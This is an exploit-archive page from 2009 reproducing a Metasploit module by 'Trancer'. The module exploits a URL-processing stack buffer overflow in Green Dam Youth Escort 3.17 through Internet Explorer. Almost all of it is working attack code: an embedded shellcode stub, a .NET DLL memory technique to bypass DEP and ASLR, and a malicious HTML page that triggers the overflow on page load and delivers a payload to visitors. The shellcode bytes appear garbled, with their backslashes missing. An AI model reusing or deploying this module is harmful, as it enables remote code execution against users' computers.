[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Green Dam 3.17 URL Processing Buffer Overflow Exploit (meta)
# Published : 2009-06-16
# Author : Trancer
# Previous Title : Edraw PDF Viewer Component < 3.2.0.126 ActiveX Insecure Method Vuln
# Next Title : McAfee 3.6.0.608 naPolicyManager.dll ActiveX Arbitrary Data Write Vuln
##
# greendam_url.rb
#
# Green Dam URL Processing Buffer Overflow exploit for the Metasploit Framework
#
# Green Dam Youth Escort 3.17 successfully exploited on the following platforms:
# - Internet Explorer 6, Windows XP SP2
# - Internet Explorer 7, Windows XP SP3
# - Internet Explorer 7, Windows Vista SP1
#
# .NET binary is used to bypass DEP and ASLR
#
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Green Dam URL Processing Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Green Dam Youth Escort
version 3.17 in the way it handles overly long URLs.
By setting an overly long URL, an attacker can overrun a buffer and execute
arbitrary code. This module uses the .NET DLL memory technique by Alexander
Sotirov and Mark Dowd and should bypass DEP, NX and ASLR.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
'Version' => '$Revision:$',
'References' =>
[
['URL', 'http://www.cse.umich.edu/~jhalderm/pub/gd/'], # Analysis of the Green Dam Censorware System
['URL', 'http://www.milw0rm.com/exploits/8938'], # Original exploit by seer[N.N.U]
['URL', 'http://taossa.com/archive/bh08sotirovdowd.pdf'], # .NET DLL memory technique
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "x00",
'Compat' =>
{
'ConnectionType' => '-find',
},
'StackAdjustment' => -3500,
# Temporary stub virtualalloc() + memcpy() payload to RWX page
'PrependEncoder' =>
"xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"+
"x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"+
"x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"+
"xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"+
"x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"+
"xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"+
"x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x54"+
"xcaxafx91xffxd6x6ax40x5ex56xc1xe6x06x56xc1xe6x08"+
"x56x6ax00xffxd0x89xc3xebx0dx5ex89xdfxb9xe8x03x00"+
"x00xfcxf3xa4xffxe3xe8xeexffxffxff"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { }],
],
'DisclosureDate' => 'Jun 11 2009',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
ibase = 0x24240000
vaddr = ibase + 0x2065
if (request.uri.match(/.dll$/i))
print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...")
return if ((p = regenerate_payload(cli)) == nil)
# First entry points to the table of pointers
vtable = [ vaddr + 4 ].pack("V")
cbase = ibase + 0x2065 + (256 * 4)
# Build a function table
255.times { vtable << [cbase].pack("V") }
# Append the shellcode
vtable << p.encoded
send_response(
cli,
Rex::Text.to_dotnetmem(ibase, vtable),
{
'Content-Type' => 'application/x-msdownload',
'Connection' => 'close',
'Pragma' => 'no-cache'
}
)
return
end
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
j_function = rand_text_alpha(rand(100)+1)
j_url = rand_text_alpha(rand(100)+1)
j_counter = rand_text_alpha(rand(30)+2)
html = %Q|<html>
<head>
<script language="javascript">
function #{j_function}() {
var #{j_url}='';
for(var #{j_counter}=1;#{j_counter}<=2035;#{j_counter}++)
#{j_url}+='$';
window.location=#{j_url}+'.html';
}
</script>
</head>
<body onload="#{j_function}()">
<object classid="#{get_resource + "/generic-" + Time.now.to_i.to_s + ".dll"}#GenericControl">
<object>
</body>
</html>
|
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end
end
# www.Syue.com [2009-06-16]